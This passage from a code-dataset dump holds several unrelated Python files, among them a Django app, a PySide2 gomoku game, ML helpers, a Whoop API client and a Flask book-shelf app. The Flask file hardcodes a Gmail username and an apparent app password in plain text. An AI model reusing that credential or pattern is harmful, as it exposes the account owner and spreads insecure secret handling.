csv_reader = csv.reader(self._cbioportal_studies.splitlines(), delimiter=\"\\t\")\n line_count = 0\n if self._multithreading:\n processes = []\n with ThreadPoolExecutor(max_workers=10, thread_name_prefix='Thread-Download') as executor:\n for row in csv_reader:\n if line_count != 0:\n processes.append(executor.submit(self.download_one_study, row[0]))\n line_count = line_count + 1\n for task in as_completed(processes):\n print(task.result())\n else:\n for row in csv_reader:\n if line_count != 0:\n self.download_one_study(row[0])\n line_count = line_count + 1\n\n def download_one_study(self, download_study):\n file_name = '{}.tar.gz'.format(download_study)\n file_url = '{}/{}'.format(\n self.get_default_parameters()[self.CONFIG_KEY_DATA_DOWNLOADER][self.CONFIG_KEY_CBIOPORTAL_DOWNLOAD_URL],\n file_name)\n file_name = download_file(file_url, self.get_local_path_root_cbioportal_repo() + '/' + file_name, self.get_logger())\n if file_name is not None:\n msg = \"The following study '{}' has been downloaded. \".format(download_study)\n else:\n msg = \"The following study '{}' hasn't been downloaded. \".format(download_study)\n self.get_logger().debug(msg)\n return file_name\n\n def check_study_identifier(self, download_study):\n return download_study in self._cbioportal_studies\n","repo_name":"codacy-badger/py-pgatk","sub_path":"pypgatk/cgenomes/cbioportal_downloader.py","file_name":"cbioportal_downloader.py","file_ext":"py","file_size_in_byte":5848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"99"} +{"seq_id":"42581835485","text":"from django.conf.urls import include, url\n\nurlpatterns = [\n # Examples:\n # url(r'^$', 'invit.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n\n url(r'^events/', include('events.urls')),\n url(r'^users/', include('users.urls')),\n url(r'^membership/', include('membership.urls')),\n]\n","repo_name":"vinay-pad/invit","sub_path":"routerv1/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"64"} +{"seq_id":"40202939367","text":"N = int(input())\noutput = 0\nfor i in range(1,N+1):\n val = int(i) #245\n tmp = val #245\n strVal = str(i) #245 str\n for j in strVal:\n tmp = tmp + int(j) # 245 + 2 + 4 + 5\n con = tmp\n if con ==N:\n output = val\n break\nprint(output) ","repo_name":"tommysgit/Coding-Test","sub_path":"백준/Bronze/2231. 분해합/분해합.py","file_name":"분해합.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"64"} +{"seq_id":"72614109003","text":"__author__ = 'Fenno'\n\nfrom numpy import array, unique\nfrom numpy.random import rand, permutation\nfrom sklearn import datasets\n\n\ndef simpledataset(n=20, spread=0.6):\n seeds = array([(0.5, 0.5), (0.5, 1.5), (1.5, 0.5), (1.5, 1.5)] * n)\n labels = array([0, 1, 2, 3] * n)\n offsets = spread * rand((4*n), 2) - (spread/2)\n return seeds+offsets, labels, 4\n\n\ndef realdataset(dataset=datasets.load_iris):\n data = dataset().data\n target = dataset().target\n shuffle = permutation(len(target))\n n_clusters = len(unique(target))\n return data[shuffle], target[shuffle], n_clusters","repo_name":"fennovj/natural-clustering","sub_path":"app/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"64"} +{"seq_id":"8666557504","text":"import sys\n\nimport PySide2\nfrom PySide2.QtGui import *\nfrom PySide2.QtWidgets import *\nfrom PySide2.QtCore import *\nfrom PySide2.QtMultimedia import QSound\n\nfrom MyButton import MyButton\nfrom Chessman import Chessman\n\n\nclass GameWidget(QWidget):\n goback_signal = Signal()\n start_signal = Signal()\n regret_signal = Signal()\n lose_signal = Signal()\n # 落子信号\n position_signal = Signal(tuple)\n\n def __init__(self, parent=None):\n super(GameWidget, self).__init__(parent=parent)\n\n self.setWindowTitle('我的五子棋')\n\n self.setWindowIcon(QIcon('source/icon.icon'))\n\n # 设置背景图片\n p = QPalette(self.palette()) # 获得当前的调色板\n brush = QBrush(QImage('source/游戏界面.png'))\n p.setBrush(QPalette.Background, brush) # 设置调色板\n self.setPalette(p) # 给窗口设置调色板\n\n self.setFixedSize(QImage('source/游戏界面.png').size())\n # 返回按钮\n self.goback_button = MyButton(self, 'source/返回按钮_hover.png', 'source/返回按钮_normal.png', 'source/返回按钮_press.png')\n self.goback_button.move(655, 80)\n self.goback_button.clicked_signal.connect(self.goback_signal)\n # 开始按钮\n self.start_button = MyButton(self, 'source/开始按钮_hover.png', 'source/开始按钮_normal.png', 'source/开始按钮_press.png')\n self.start_button.move(640, 240)\n self.start_button.clicked_signal.connect(self.start_signal)\n # 悔棋按钮\n self.regret_button = MyButton(self, 'source/悔棋按钮_hover.png', 'source/悔棋按钮_normal.png', 'source/悔棋按钮_press.png')\n self.regret_button.move(640, 300)\n self.regret_button.clicked_signal.connect(self.regret_signal)\n # 认输按钮\n self.lose_button = MyButton(self, 'source/认输按钮_hover.png', 'source/认输按钮_normal.png', 'source/认输按钮_press.png')\n self.lose_button.move(640, 360)\n self.lose_button.clicked_signal.connect(self.lose_signal)\n\n # 落子标识\n self.focus_point = QLabel(self)\n self.focus_point.setPixmap(QPixmap('source/标识.png'))\n self.focus_point.hide()\n\n # 获胜图片\n self.win_lbl = QLabel(self)\n self.win_lbl.hide()\n\n # 存储棋盘上所有棋子\n self.chessman_list = []\n\n def resert(self):\n '''\n 重置棋盘\n '''\n # range(0,len(self.chessman_list))\n for i in list(range(0, len(self.chessman_list)))[::-1]: # 下标逆序 从后往前\n self.chessman_list[i].close() # 关闭棋子显示\n del self.chessman_list[i] # 销毁棋子\n self.focus_point.hide() # 隐藏标识\n self.win_lbl.hide() # 隐藏获胜标识\n\n def mouseReleaseEvent(self, event: PySide2.QtGui.QMouseEvent):\n '''\n 处理鼠标释放事件\n '''\n coord_x = event.x() # 获得鼠标x坐标\n coord_y = event.y()\n\n # 坐标转换成位置\n pos = self.reverse_to_position((coord_x, coord_y))\n # 如果位置有效,则发送落子信号\n if pos is None:\n return\n else:\n self.position_signal.emit(pos)\n\n # position:tuple 为参数指定类型 为tuple,可以不写\n def reverse_to_coordinate(self, position: tuple):\n '''\n 将落子位置转换成坐标\n\n x坐标 = 50 + 水平位置 * 30\n y坐标 = 50 + 垂直位置 * 30\n '''\n\n x = 50 + position[0] * 30\n y = 50 + position[1] * 30\n return (x, y)\n\n def reverse_to_position(self, coordinate: tuple) -> tuple:\n '''\n 将点击坐标转换成落子位置\n '''\n # 判断落子坐标是否有效\n # 棋盘坐标范围:左 > 35 上 > 35 右 < 590+15 下边 < 590 + 15\n x = coordinate[0]\n y = coordinate[1]\n if x <= 35 or x >= 590 + 15 or y <= 35 or y >= 590 + 15:\n return\n # 将坐标转换为落子位置\n # 思路 相对于35坐标偏向右移多少个30的宽度\n pos_x = (x - 35) // 30\n pos_y = (y - 35) // 30\n return(pos_x,pos_y)\n\n def down_chess(self, position, color):\n '''\n 落子\n position:落子位置\n x:水平位置 19个位置,0~18\n y:垂直位置 19个位置,0~18\n color:棋子颜色\n '''\n # 构建一个棋子\n chessman = Chessman(color, self) # 棋子颜色、父窗口\n # 将位置转换成坐标,然后将棋子移动到该位置\n coord = QPoint(*self.reverse_to_coordinate(position))\n chessman.move(coord)\n chessman.show()\n chessman.raise_() # 确保棋子显示\n # 播放落子声\n QSound.play('source/luozisheng.wav')\n # 将棋子放到当前棋子列表中\n self.chessman_list.append(chessman)\n # 显示棋子标识、\n self.focus_point.move(coord.x() - 15, coord.y() - 15)\n self.focus_point.show()\n # 让标识在上层显示\n self.focus_point.raise_()\n\n def goback(self):\n '''\n 悔棋\n '''\n # 判断 如果没有棋子,则函数返回\n if len(self.chessman_list) == 0:\n return\n # 获取最后一个棋子\n chessman = self.chessman_list.pop()\n # 从界面删除棋子\n chessman.close()\n # 销毁棋子对象\n del chessman\n # 隐藏标识\n self.focus_point.hide()\n\n def show_win(self, color):\n '''\n color: 获胜方 颜色\n '''\n if color == 'White':\n # 白棋获胜\n self.win_lbl.setPixmap(QPixmap('source/白棋胜利.png'))\n else:\n # 黑棋获胜\n self.win_lbl.setPixmap(QPixmap('source/黑棋胜利.png'))\n self.win_lbl.move(65, 84)\n self.win_lbl.show()\n self.win_lbl.raise_()\n\n\n\nif __name__ == '__main__':\n app = QApplication([])\n w = GameWidget()\n def print_position(position):\n print('print_position:', position)\n w.down_chess(position,'Black')\n # 绑定悔棋按钮与悔棋方法\n w.regret_signal.connect(w.goback)\n # 绑定开始按钮与清空棋盘方法\n w.start_signal.connect(w.resert)\n # 绑定落子信号和打印测试\n w.position_signal.connect(print_position)\n w.show_win('Black')\n w.down_chess((10, 15), 'White')\n w.show()\n sys.exit(app.exec_())\n","repo_name":"CKSYJ3040/GoBang","sub_path":"GameWidget.py","file_name":"GameWidget.py","file_ext":"py","file_size_in_byte":6497,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"64"} +{"seq_id":"30603063730","text":"from django.urls import reverse_lazy\nfrom django.test import tag\nfrom django.views.generic import CreateView, UpdateView\n\nfrom . import SharedModelsFactoryFloor as FactoryFloor\nfrom .common_tests import CommonTest\nfrom .. import views\nfrom .. import models\nfrom ..views import CommonUpdateView\n\n\nclass TestSectionUpdateView(CommonTest):\n def setUp(self):\n super().setUp()\n self.instance = FactoryFloor.SectionFactory()\n self.test_url = reverse_lazy('shared_models:section_edit', kwargs={\"pk\": self.instance.pk})\n self.expected_template = 'shared_models/org_form.html'\n self.admin_user = self.get_and_login_user(in_group=\"travel_admin\")\n\n @tag(\"section_edit\", 'update', \"view\")\n def test_view_class(self):\n self.assert_inheritance(views.SectionUpdateView, CommonUpdateView)\n self.assert_inheritance(views.SectionUpdateView, views.AdminRequiredMixin)\n\n @tag(\"section_edit\", 'update', \"access\")\n def test_view(self):\n self.assert_not_broken(self.test_url)\n self.assert_non_public_view(test_url=self.test_url, expected_template=self.expected_template, user=self.admin_user)\n\n\n @tag(\"section_edit\", 'update', \"submit\")\n def test_submit(self):\n data = FactoryFloor.SectionFactory.get_valid_data()\n self.assert_success_url(self.test_url, data=data, user=self.admin_user)\n\n\n\nclass TestDivisionUpdateView(CommonTest):\n def setUp(self):\n super().setUp()\n self.instance = FactoryFloor.DivisionFactory()\n self.test_url = reverse_lazy('shared_models:division_edit', kwargs={\"pk\": self.instance.pk})\n self.expected_template = 'shared_models/org_form.html'\n self.admin_user = self.get_and_login_user(in_group=\"travel_admin\")\n\n @tag(\"division_edit\", 'update', \"view\")\n def test_view_class(self):\n self.assert_inheritance(views.DivisionUpdateView, CommonUpdateView)\n self.assert_inheritance(views.DivisionUpdateView, views.AdminRequiredMixin)\n\n @tag(\"division_edit\", 'update', \"access\")\n def test_view(self):\n self.assert_not_broken(self.test_url)\n self.assert_non_public_view(test_url=self.test_url, expected_template=self.expected_template, user=self.admin_user)\n\n\n @tag(\"division_edit\", 'update', \"submit\")\n def test_submit(self):\n data = FactoryFloor.DivisionFactory.get_valid_data()\n self.assert_success_url(self.test_url, data=data, user=self.admin_user)\n\n\nclass TestBranchUpdateView(CommonTest):\n def setUp(self):\n super().setUp()\n self.instance = FactoryFloor.BranchFactory()\n self.test_url = reverse_lazy('shared_models:branch_edit', kwargs={\"pk\": self.instance.pk})\n self.expected_template = 'shared_models/org_form.html'\n self.admin_user = self.get_and_login_user(in_group=\"travel_admin\")\n\n @tag(\"branch_edit\", 'update', \"view\")\n def test_view_class(self):\n self.assert_inheritance(views.BranchUpdateView, CommonUpdateView)\n self.assert_inheritance(views.BranchUpdateView, views.AdminRequiredMixin)\n\n @tag(\"branch_edit\", 'update', \"access\")\n def test_view(self):\n self.assert_not_broken(self.test_url)\n self.assert_non_public_view(test_url=self.test_url, expected_template=self.expected_template, user=self.admin_user)\n\n\n @tag(\"branch_edit\", 'update', \"submit\")\n def test_submit(self):\n data = FactoryFloor.BranchFactory.get_valid_data()\n self.assert_success_url(self.test_url, data=data, user=self.admin_user)\n\n\nclass TestRegionUpdateView(CommonTest):\n def setUp(self):\n super().setUp()\n self.instance = FactoryFloor.RegionFactory()\n self.test_url = reverse_lazy('shared_models:region_edit', kwargs={\"pk\": self.instance.pk})\n self.expected_template = 'shared_models/org_form.html'\n self.admin_user = self.get_and_login_user(in_group=\"travel_admin\")\n\n @tag(\"region_edit\", 'update', \"view\")\n def test_view_class(self):\n self.assert_inheritance(views.RegionUpdateView, CommonUpdateView)\n self.assert_inheritance(views.RegionUpdateView, views.AdminRequiredMixin)\n\n @tag(\"region_edit\", 'update', \"access\")\n def test_view(self):\n self.assert_not_broken(self.test_url)\n self.assert_non_public_view(test_url=self.test_url, expected_template=self.expected_template, user=self.admin_user)\n\n\n @tag(\"region_edit\", 'update', \"submit\")\n def test_submit(self):\n data = FactoryFloor.RegionFactory.get_valid_data()\n self.assert_success_url(self.test_url, data=data, user=self.admin_user)\n","repo_name":"tynando/dm_apps","sub_path":"shared_models/test/test_update_views.py","file_name":"test_update_views.py","file_ext":"py","file_size_in_byte":4558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"64"} +{"seq_id":"24137823655","text":"import math\nimport array\nimport random\nimport sys\n\nRAND_MAX=2147483647\n\n\nclass Gaussian():\n def __init__(self):\n self.gauss_random = 0;\n self.available_gauss = 0;\n self.prev_mean = -100000;\n self.prev_variance = -10000;\n\n\ndef read_seed():\n fp = open(\"/dev/random\", \"rb\");\n seed=fp.read(sys.getsizeof(int))\n fp.close()\n return seed\n\ndef generate_seed():\n seed=read_seed()\n random.seed(seed)\n return seed\n\ndef generate_seed_verbose():\n seed=generate_seed()\n fp.write (\"seed: %x\\n\" % (seed))\n return seed\n\ndef uniform_random_():\n return (float(random.randint(0, RAND_MAX))/float(RAND_MAX))\n\ndef uniform_random(min, max):\n return ((uniform_random_()*(max-min))+min)\n \ndef uniform_int_random(min, max):\n return int(round(uniform_random(float(min)-0.499999, float(max)+0.499999)))\n\ndef gaussian_random(g, m, v):\n if (g.available_gauss==False or m!=g.prev_mean or v!=g.prev_variance):\n rsq=1.0\n rsq=0.0\n fac=0\n while(rsq>=1.0 or rsq==0.0):\n r1=uniform_random(-1,1)\n r2=uniform_random(-1, 1)\n rsq=r1*r1+r2*r2\n \n fac=math.sqrt((-2.0*math.log(rsq))/rsq)\n g.gauss_random=(r2*fac)*math.sqrt(v) + m;\n g.available_gauss = True;\n g.prev_mean = m;\n g.prev_variance = v;\n\n return (r1*fac)*math.sqrt(v) + m;\n\n else:\n g.available_gauss = False;\n return g.gauss_random;\n \n\ndef main(m,v):\n generate_seed()\n N=100\n sum=0\n gaussian=Gaussian()\n x=[]\n \n #print \"before loop\"\n for i in range (N):\n x.append(gaussian_random(gaussian, m, v))\n sum+=x[i]\n \"\"\"\n for i in range (N):\n print x[i]\n \"\"\"\n return (sum/float(N))\n\n#main(0.0, 4.0)\n\n","repo_name":"SajidQ/AI_CS382_Projects","sub_path":"002-Probabilistic_State_Estimation/PartB/Program/gaussian.py","file_name":"gaussian.py","file_ext":"py","file_size_in_byte":1728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"64"} +{"seq_id":"37268458630","text":"from sklearn.model_selection import ShuffleSplit, cross_validate, KFold\nfrom sklearn import datasets\nfrom sklearn.tree import DecisionTreeClassifier\nimport numpy as np\nfrom typing import Dict\n\n\ndef prepare_data(num_train=60000, num_test=10000, normalize=True):\n\n X, y = datasets.fetch_openml(\n \"mnist_784\",\n version = 1,\n return_X_y = True,\n as_frame = False\n )\n\n if normalize:\n X = X / X.max()\n\n y = y.astype(int)\n Xtrain, Xtest = X[:num_train], X[num_train:num_train + num_test]\n ytrain, ytest = y[:num_train], y[num_train:num_train + num_test]\n return Xtrain, ytrain, Xtest, ytest\n\n\ndef filter_out_7_9s(X, y):\n seven_nine_idx = (y == 7) | (y == 9)\n X_binary = X[seven_nine_idx, :]\n y_binary = y[seven_nine_idx]\n return X_binary, y_binary\n\n\ndef train_simple_classifier_with_cv(Xtrain,\n ytrain,\n clf,\n n_splits = 5,\n cv_class = KFold):\n\n cv = cv_class(n_splits=n_splits)\n scores = cross_validate(clf, Xtrain, ytrain, cv=cv)\n return scores\n\n\ndef print_cv_result_dict(cv_dict: Dict):\n for (key, array) in cv_dict.items():\n print(f\"mean_{key}: {array.mean()}, std_{key}: {array.std()}\")\n\n\nif __name__ == \"__main__\":\n Xtrain, ytrain, Xtest, ytest = prepare_data()\n Xtrain, ytrain = filter_out_7_9s(Xtrain, ytrain)\n Xtest, ytest = filter_out_7_9s(Xtest, ytest)\n\n out_dict = train_simple_classifier_with_cv(\n Xtrain,\n ytrain,\n DecisionTreeClassifier()\n )\n print(\"running cross validation...\")\n print_cv_result_dict(out_dict)\n","repo_name":"klionjarod/Grad-School","sub_path":"Spring 2022/CAP5771 - Data Mining/Coding HW/HW1 - Classification of MNIST/mnist_assignment_starter.py","file_name":"mnist_assignment_starter.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"64"} +{"seq_id":"20979456843","text":"from django.urls import include, path\nfrom rest_framework_nested import routers\nfrom groups import views\n\napp_name = \"groups\"\n\nrouter = routers.SimpleRouter(trailing_slash=False)\nrouter.register(r\"groups\", views.GroupsModelViewSet, basename=\"groups\")\n\ngroups_router = routers.NestedSimpleRouter(router, r'groups', lookup='group', trailing_slash=False)\ngroups_router.register(r'members', views.MemberModelViewSet, basename='group-members')\ngroups_router.register(r'titles', views.ProjectTitleModelViewSet, basename='group-titles')\nrouter.register(r\"advisors\", views.AdvisorModelViewSet, basename=\"groups-advisor\")\nrouter.register(r\"examiners\", views.ExaminerModelViewSet, basename=\"groups-examiner\")\nrouter.register(r\"titles\", views.AllProjectTitleModelViewSet, basename=\"all-titles\")\n\nurlpatterns = [\n path(r'', include(router.urls)),\n path(r'', include(groups_router.urls)),\n path(\"check-similarity//\", views.similarity_check, name=\"check-similarity\"),\n path(\"approve-title/\", views.approve_title, name=\"approve-title\"),\n path(\"reject-title/\", views.reject_title, name=\"reject-title\"),\n] \n","repo_name":"aleale2121/project_management","sub_path":"app/groups/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"64"} +{"seq_id":"448408441","text":"import datetime\nimport pandas as pd\nimport requests\nimport streamlit as st\n\nwhoop_headers = {\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36',\n 'Content-Type': 'application/json;charset=UTF-8',\n}\n\ndef get_clean_whoop_data():\n\n response = get_whoop_response()\n df = get_dataframe(response)\n\n return df\n\ndef get_dataframe(response):\n rolling_window = '14D'\n new_years_day = datetime.date(2020, 12, 31)\n\n df = (\n pd.DataFrame(parse_response(response))\n .query('rem == rem')\n .assign(\n dt = lambda x: x['dt'].apply(lambda x: pd.to_datetime(x)),\n average_rhr = lambda x: x.rolling(rolling_window, on = 'dt')['resting_heart_rate'].mean().to_numpy(),\n )\n .query('dt >= @new_years_day')\n )\n\n return df\n\ndef get_whoop_response():\n\n whoop_headers.update({'authorization': f'bearer {get_access_token()}'})\n\n params = (\n ('end', f'{get_today()}T04:59:59.999Z'),\n ('start', '2020-06-21T05:00:00.000Z'),\n )\n\n response = requests.get(\n 'https://api-7.whoop.com/users/340847/cycles',\n headers=whoop_headers,\n params=params\n )\n\n return response\n\ndef parse_response(response):\n\n parsed = []\n\n for element in response.json():\n dt = element['days'][0]\n whoop_id = element['id']\n sleeps = element['sleep']['sleeps']\n strain = element['strain']['score']\n if element['recovery']:\n rhv = element['recovery'].get('heartRateVariabilityRmssd')\n\n for sleep in sleeps:\n rem = sleep['remSleepDuration']\n deep = sleep['slowWaveSleepDuration']\n in_bed = sleep['inBedDuration']\n respiratory_rate = sleep['respiratoryRate']\n\n row = {\n 'dt': dt,\n 'whoop_id': whoop_id,\n 'rem': rem,\n 'deep': deep,\n 'strain': strain,\n 'rhv': rhv,\n 'in_bed': in_bed,\n 'resting_heart_rate': element['recovery']['restingHeartRate'],\n 'respiratory_rate': respiratory_rate,\n }\n parsed.append(row)\n\n return parsed\n\ndef get_today():\n return str(datetime.datetime.today().date())\n\ndef get_access_token():\n response = requests.post(\n 'https://api-7.whoop.com/oauth/token',\n headers=whoop_headers,\n data=st.secrets['WHOOP_TOKEN_CREDENTIALS']\n )\n\n return response.json()['access_token']\n","repo_name":"BrandonEmmerich/health-app","sub_path":"health_app/get_whoop.py","file_name":"get_whoop.py","file_ext":"py","file_size_in_byte":2628,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"64"} +{"seq_id":"2485155389","text":"import os\nfrom os import urandom\nfrom flask import Flask\nfrom flask_login import LoginManager, current_user\nfrom flask_mail import Mail\nfrom flask_sqlalchemy import SQLAlchemy\n\napp = Flask(__name__)\n\napp.config[\"SECRET_KEY\"] = urandom(32)\n\nif os.environ.get(\"HEROKU\"):\n app.config[\"SQLALCHEMY_DATABASE_URI\"] = os.environ.get(\"DATABASE_URL\")\nelse:\n app.config[\"SQLALCHEMY_DATABASE_URI\"] = \"sqlite:///books.db\"\n app.config[\"SQLALCHEMY_ECHO\"] = True\n\ndb = SQLAlchemy(app)\n\n# kirjautuminen\n\nlogin_manager = LoginManager()\nlogin_manager.init_app(app)\n\nlogin_manager.login_view = \"auth_login\"\nlogin_manager.login_message = \"Tämä toiminto vaatii kirjautumisen.\"\nlogin_manager.login_message_category = 'info'\n\nmail = Mail(app)\n\napp.config['MAIL_SERVER'] = 'smtp.gmail.com'\napp.config['MAIL_PORT'] = 465\napp.config['MAIL_USE_TLS'] = False\napp.config['MAIL_USE_SSL'] = True\napp.config['MAIL_USERNAME'] = 'tsohakirjahylly@gmail.com'\napp.config['MAIL_PASSWORD'] = 'nuxhatnhlegfdkfr'\nmail = Mail(app)\nmail.init_app(app)\n\nfrom functools import wraps\n\n\ndef login_required(role=\"ANY\"):\n def wrapper(fn):\n @wraps(fn)\n def decorated_view(*args, **kwargs):\n if not current_user:\n return login_manager.unauthorized()\n\n if not current_user.is_authenticated:\n return login_manager.unauthorized()\n\n unauthorized = False\n\n if role != \"ANY\":\n unauthorized = True\n\n if current_user.role == role:\n unauthorized = False\n\n if unauthorized:\n return login_manager.unauthorized()\n\n return fn(*args, **kwargs)\n\n return decorated_view\n\n return wrapper\n\n\n# oman sovelluksen toiminnallisuudet\nfrom application import views\n\nfrom application.books import models\nfrom application.books import views\n\nfrom application.auth import models\nfrom application.auth import views\n\nfrom application.authors import models\nfrom application.authors import views\n\n# kirjautuminen osa 2\n\nfrom application.auth.models import User\nfrom application.auth.models import users_books\n\n\n@login_manager.user_loader\ndef load_user(user_id):\n return User.query.get(user_id)\n\n\n# taulut tarvittaessa tietokantaan\ntry:\n db.create_all()\nexcept:\n pass\n","repo_name":"riinaalisah/Kirjahylly","sub_path":"application/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"64"} +{"seq_id":"8620561190","text":"import numpy as np\nfrom scipy.special import logsumexp\nimport traceback\n\nfrom logsign import *\n\ndef test_test_ls():\n return True\n\n\ndef test_real2ls():\n try:\n x = real2ls(4.0)\n assert x['mag'] == np.log(4)\n assert x['sgn'] == 1\n\n x = real2ls(-3)\n assert x['mag'] == np.log(3)\n assert x['sgn'] == -1\n\n x = real2ls(0.0)\n assert x['mag'] == -np.inf\n assert x['sgn'] == 0\n except AssertionError:\n print(traceback.format_exc())\n\n return False\n else:\n return True\n\n\ndef test_ls2real():\n try:\n x = real2ls(4.0)\n z = ls2real(x)\n assert np.isclose(z, 4.0)\n\n x = real2ls(-3)\n z = ls2real(x)\n assert np.isclose(z, -3)\n\n x = real2ls(0.0)\n z = ls2real(x)\n assert np.isclose(z, 0.0)\n except AssertionError:\n print(traceback.format_exc())\n\n return False\n else:\n return True\n\n\ndef test_isls():\n return True\n\n\ndef test_ls_add():\n try:\n print()\n except AssertionError:\n print(traceback.format_exc())\n\n return False\n else:\n return True\n\n\ndef test_ls_sum():\n try:\n print()\n except AssertionError:\n print(traceback.format_exc())\n\n return False\n else:\n return True\n\n\ndef test_ls_mul(x, y):\n \"\"\"multiply two numbers (or vectors of numbers) in log-sign space\"\"\"\n assert isls(x) and isls(y)\n assert x.shape == y.shape\n\n z = np.empty_like(x)\n z['mag'] = x['mag'] + y['mag']\n z['sgn'] = x['sgn'] * y['sgn']\n\n return z\n\n\ndef test_ls_exp(x):\n \"\"\"exponentiate a number (or vector of numbers) in log-sign space\"\"\"\n assert isls(x)\n\n z = np.empty_like(x)\n z['mag'] = x['sgn'] * np.exp(x['mag'])\n z['sgn'] = 1\n\n return z\n\n\ndef test_ls_log(x):\n \"\"\"compute the log of a number (or vector) in log-sign space\"\"\"\n assert isls(x)\n\n z = np.empty_like(x)\n if x['sgn'] == 1:\n # x is already the desired quantity in linear space, we just need to go one layer deeper\n z['mag'] = np.log(x['mag'])\n z['sgn'] = np.sign(x['mag'])\n elif x['sgn'] == 0:\n # log(0) = -inf, but in ls-space\n z['mag'] = np.inf\n z['sgn'] = -1\n else: # x['sgn'] == -1:\n # log(x \\in Z^-) = nan\n # TODO: warning?\n z['mag'] = np.nan\n z['sgn'] = np.nan\n\n return z\n\n\nif __name__ == \"__main__\":\n print(\"test_real2ls: %s\" % test_real2ls())\n print(\"test_ls2real: %s\" % test_ls2real())","repo_name":"kwinner/latentcountmodels","sub_path":"archive/lsgdual/python/kevin/test_logsign.py","file_name":"test_logsign.py","file_ext":"py","file_size_in_byte":2504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"64"} +{"seq_id":"9726336880","text":"class ticket():\r\n def __init__(self,adult=True,weekend=False):#默认是成人,如不是需声明,默认是工作日\r\n self.ticket=100\r\n if adult==True:\r\n self.discount=1\r\n else:\r\n self.discount=0.5\r\n\r\n if weekend==True:\r\n self.inc=1.2\r\n else:\r\n self.inc=1\r\n\r\n def price(self,num): #self指的是定义的函数本身,是具体的实例化对象的名字\r\n return self.ticket*self.discount*self.inc*num\r\n\r\nadult=ticket()\r\nchild=ticket(adult=False)\r\nnum_adult=input('请输入成人数量:')\r\nnum_child=input('请输入小孩数量:')\r\ntotal_price=adult.price(int(num_adult))+child.price(int(num_child))\r\nprint(\"%s个成人和%s个小孩的平日票价为%s\"%(num_adult,num_child,total_price))\r\n \r\n \r\n \r\n \r\n","repo_name":"kunkun1230/Homework","sub_path":"类定义成人和小孩票价.py","file_name":"类定义成人和小孩票价.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"zh","doc_type":"code","stars":4,"dataset":"github-code","pt":"64"} +{"seq_id":"21728073234","text":"import numpy as np\nfrom pyqubo import Array, solve_ising\n\nN = 10\n\nif __name__ == '__main__':\n data = np.random.random(N)\n data /= data.sum()\n data = np.array([1, 2000, 1000, 1001])\n print(data)\n\n spin = Array.create('spin', shape=len(data), vartype='SPIN')\n H = (sum([data[i] * spin[i] for i in range(len(data))]))**2\n model = H.compile()\n h, j, _ = model.to_ising()\n solution = solve_ising(h, j)\n decoded = model.decode_sample(solution, vartype='SPIN')\n labels = np.array([decoded.array('spin', idx) for idx in range(len(data))])\n print(f\"{data[labels>0]}: {data[labels>0].sum()})\")\n print(f\"{data[labels<0]}: {data[labels<0].sum()})\")\n","repo_name":"takerun0728/practice-optimization","sub_path":"number_partitioning.py","file_name":"number_partitioning.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"64"} +{"seq_id":"36218740014","text":"# Databricks notebook source\nfrom pyspark.sql.functions import col, sum, when, count\n\n# COMMAND ----------\n\ndbutils.widgets.text(\"p_file_date\",\"2021-03-21\")\nv_file_date=dbutils.widgets.get(\"p_file_date\")\n\n# COMMAND ----------\n\n# MAGIC %run \"/Formula1/includes/common_functions\"\n\n# COMMAND ----------\n\n# MAGIC %run \"/Formula1/includes/configuration\"\n\n# COMMAND ----------\n\nrace_results_list=spark.read.format(\"delta\").load(f\"{presentation_folder_path}/race_results\") \\\n .filter(f\"file_date='{v_file_date}'\") \\\n .select(\"race_year\") \\\n .distinct() \\\n .collect()\nrace_year_list=[i.race_year for i in race_results_list]\n\n# COMMAND ----------\n\nrace_results_df=spark.read.format(\"delta\").load(f\"{presentation_folder_path}/race_results\") \\\n .filter(col(\"race_year\").isin(race_year_list))\n\n# COMMAND ----------\n\ndisplay(race_results_df)\n\n# COMMAND ----------\n\nfrom pyspark.sql.functions import sum,when,count,col\n\n# COMMAND ----------\n\nconstructor_standings_df=race_results_df.groupBy(\"race_year\",\"team\") \\\n .agg(sum(\"points\").alias(\"total_points\"),count(when(col(\"position\")==1,True)).alias(\"wins\"))\n\n# COMMAND ----------\n\ndisplay(constructor_standings_df.filter(\"race_year==2020\"))\n\n# COMMAND ----------\n\nfrom pyspark.sql.window import Window\nfrom pyspark.sql.functions import desc,rank,asc\n\n# COMMAND ----------\n\nconstructor_rank_spec=Window.partitionBy(\"race_year\").orderBy(desc(\"total_points\"), desc(\"wins\"))\n\n# COMMAND ----------\n\nfinal_df=constructor_standings_df.withColumn(\"rank\",rank().over(constructor_rank_spec))\n\n# COMMAND ----------\n\ndisplay(final_df.filter('race_year = 2020'))\n\n# COMMAND ----------\n\n# final_df.write.mode('overwrite').format(\"parquet\").saveAsTable(\"f1_presentation.constructor_standings\")\n# incremental_load(final_df,\"f1_presentation\",\"constructor_standings\",\"race_year\")\nmerge_condition=\"tgt.team=src.team AND 